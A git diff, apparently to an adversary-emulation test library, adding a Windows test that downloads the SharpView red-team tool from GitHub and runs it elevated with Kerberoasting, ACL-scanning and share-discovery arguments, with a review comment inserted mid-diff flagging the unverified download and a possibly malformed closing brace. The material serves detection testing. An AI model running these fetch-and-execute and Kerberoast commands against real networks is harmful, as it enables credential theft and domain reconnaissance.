diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 05cfd87a..ec371714 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -660,6 +660,7 @@ discovery,T1016,System Network Configuration Discovery,7,Qakbot Recon,121de5c6-5
 discovery,T1049,System Network Connections Discovery,1,System Network Connections Discovery,0940a971-809a-48f1-9c4d-b1d785e96ee5,command_prompt
 discovery,T1049,System Network Connections Discovery,2,System Network Connections Discovery with PowerShell,f069f0f1-baad-4831-aa2b-eddac4baac4a,powershell
 discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery Linux & MacOS,9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
+discovery,T1049,System Network Connections Discovery,4,System Discovery using SharpView,96f974bb-a0da-4d87-a744-ff33e73367e9,powershell
 discovery,T1033,System Owner/User Discovery,1,System Owner/User Discovery,4c4959bf-addf-4b4a-be86-8d09cc1857aa,command_prompt
 discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh
 discovery,T1033,System Owner/User Discovery,3,Find computers where user has session - Stealth mode (PowerView),29857f27-a36f-4f7e-8084-4557cd6207ca,powershell
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index b2555df7..70c42fb0 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -465,6 +465,7 @@ discovery,T1016,System Network Configuration Discovery,6,Adfind - Enumerate Acti
 discovery,T1016,System Network Configuration Discovery,7,Qakbot Recon,121de5c6-5818-4868-b8a7-8fd07c455c1b,command_prompt
 discovery,T1049,System Network Connections Discovery,1,System Network Connections Discovery,0940a971-809a-48f1-9c4d-b1d785e96ee5,command_prompt
 discovery,T1049,System Network Connections Discovery,2,System Network Connections Discovery with PowerShell,f069f0f1-baad-4831-aa2b-eddac4baac4a,powershell
+discovery,T1049,System Network Connections Discovery,4,System Discovery using SharpView,96f974bb-a0da-4d87-a744-ff33e73367e9,powershell
 discovery,T1033,System Owner/User Discovery,1,System Owner/User Discovery,4c4959bf-addf-4b4a-be86-8d09cc1857aa,command_prompt
 discovery,T1033,System Owner/User Discovery,3,Find computers where user has session - Stealth mode (PowerView),29857f27-a36f-4f7e-8084-4557cd6207ca,powershell
 discovery,T1007,System Service Discovery,1,System Service Discovery,89676ba1-b1f8-47ee-b940-2e1a113ebc71,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 5e778201..37dc3296 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -1155,6 +1155,7 @@
 - Atomic Test #1: System Network Connections Discovery [windows]
 - Atomic Test #2: System Network Connections Discovery with PowerShell [windows]
 - Atomic Test #3: System Network Connections Discovery Linux & MacOS [linux, macos]
+ - Atomic Test #4: System Discovery using SharpView [windows]
 - [T1033 System Owner/User Discovery](../../T1033/T1033.md)
 - Atomic Test #1: System Owner/User Discovery [windows]
 - Atomic Test #2: System Owner/User Discovery [linux, macos]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 62c22ec4..503a9d2d 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -851,6 +851,7 @@
 - [T1049 System Network Connections Discovery](../../T1049/T1049.md)
 - Atomic Test #1: System Network Connections Discovery [windows]
 - Atomic Test #2: System Network Connections Discovery with PowerShell [windows]
+ - Atomic Test #4: System Discovery using SharpView [windows]
 - [T1033 System Owner/User Discovery](../../T1033/T1033.md)
 - Atomic Test #1: System Owner/User Discovery [windows]
 - Atomic Test #3: Find computers where user has session - Stealth mode (PowerView) [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 246a2d24..cac1c592 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -47701,6 +47701,48 @@ discovery: netstat who -a name: sh + - name: System Discovery using SharpView + auto_generated_guid: 96f974bb-a0da-4d87-a744-ff33e73367e9 + description: "Get a listing of network connections, domains, domain users, and + etc. \nsharpview.exe located in the bin folder, an opensource red-team tool.\nUpon + successful execution, cmd.exe will execute sharpview.exe . Results + will output via stdout.\n" + supported_platforms: + - windows + input_arguments: + SharpView_url: + description: sharpview download URL + type: url + default: https://github.com/tevora-threat/SharpView/blob/b60456286b41bb055ee7bc2a14d645410cca9b74/Compiled/SharpView.exe?raw=true + SharpView: + description: Path of the executable opensource redteam tool used for the + performing this atomic. + type: path + default: PathToAtomicsFolder\T1049\bin\SharpView.exe + syntax: + description: Arguements method used along with SharpView to get listing + of network connections, domains, domain users, and etc. + type: String + default: "\"Invoke-ACLScanner\", \"Invoke-Kerberoast\", \"Find-DomainShare\" + \n" + dependency_executor_name: powershell + dependencies: + - description: 'Sharpview.exe must exist on disk at specified location (#{SharpView}) + +' + prereq_command: 'if (Test-Path #{SharpView}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{SharpView}) -ErrorAction ignore | Out-Null + Invoke-WebRequest #{SharpView_url} -OutFile "#{SharpView}" + executor: + name: powershell + elevation_required: true + command: | + $syntaxList = #{syntax} + foreach ($syntax in $syntaxList) { + #{SharpView} $syntax -} T1033: technique: created: '2017-05-31T21:30:35.733Z' diff --git a/atomics/T1049/T1049.md b/atomics/T1049/T1049.md index a1b312df..414e5e25 100644 --- a/atomics/T1049/T1049.md +++ b/atomics/T1049/T1049.md 
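Review bot: The get_prereq_command of the added SharpView test fetches an executable with `Invoke-WebRequest #{SharpView_url} -OutFile "#{SharpView}"` and the executor then runs it with `elevation_required: true`, but nothing verifies what was downloaded before it is executed; the URL pins a commit, which is not an integrity check on the file that lands on disk. I would add after the download `if ((Get-FileHash "#{SharpView}" -Algorithm SHA256).Hash -ne "<EXPECTED_SHA256_PLACEHOLDER>") { Remove-Item "#{SharpView}"; exit 1 }` with the expected hash recorded next to the URL, and a cleanup_command that removes the binary, since the test currently leaves it in place. The description's statement that `cmd.exe will execute sharpview.exe` does not match `executor: name: powershell`, and the command's final line reads `#{SharpView} $syntax -}` here; if that is the literal text rather than a diff artifact, the closing `}` belongs on its own line. The same text is repeated in the T1049.md hunk at the end of this diff, and since both files look generated the fix presumably belongs in the test's source YAML. Separately, the default `syntax` list (Invoke-ACLScanner, Invoke-Kerberoast, Find-DomainShare) exercises more than network-connection discovery, so the T1049 mapping and the test name may be worth revisiting before merge.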
@@ -14,6 +14,8 @@ Utilities and commands that acquire this information include [netstat](https://a - [Atomic Test #3 - System Network Connections Discovery Linux & MacOS](#atomic-test-3---system-network-connections-discovery-linux--macos) +- [Atomic Test #4 - System Discovery using SharpView](#atomic-test-4---system-discovery-using-sharpview) +
@@ -107,4 +109,52 @@ echo "Install netstat on the machine."; exit 1; +
+
+ +## Atomic Test #4 - System Discovery using SharpView +Get a listing of network connections, domains, domain users, and etc. +sharpview.exe located in the bin folder, an opensource red-team tool. +Upon successful execution, cmd.exe will execute sharpview.exe . Results will output via stdout. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| SharpView_url | sharpview download URL | url | https://github.com/tevora-threat/SharpView/blob/b60456286b41bb055ee7bc2a14d645410cca9b74/Compiled/SharpView.exe?raw=true| +| SharpView | Path of the executable opensource redteam tool used for the performing this atomic. | path | PathToAtomicsFolder\T1049\bin\SharpView.exe| +| syntax | Arguements method used along with SharpView to get listing of network connections, domains, domain users, and etc. | String | "Invoke-ACLScanner", "Invoke-Kerberoast", "Find-DomainShare"| + + +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) + + +```powershell +$syntaxList = #{syntax} +foreach ($syntax in $syntaxList) { +#{SharpView} $syntax -} +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: Sharpview.exe must exist on disk at specified location (#{SharpView}) +##### Check Prereq Commands: +```powershell +if (Test-Path #{SharpView}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +New-Item -Type Directory (split-path #{SharpView}) -ErrorAction ignore | Out-Null +Invoke-WebRequest #{SharpView_url} -OutFile "#{SharpView}" +``` + + + +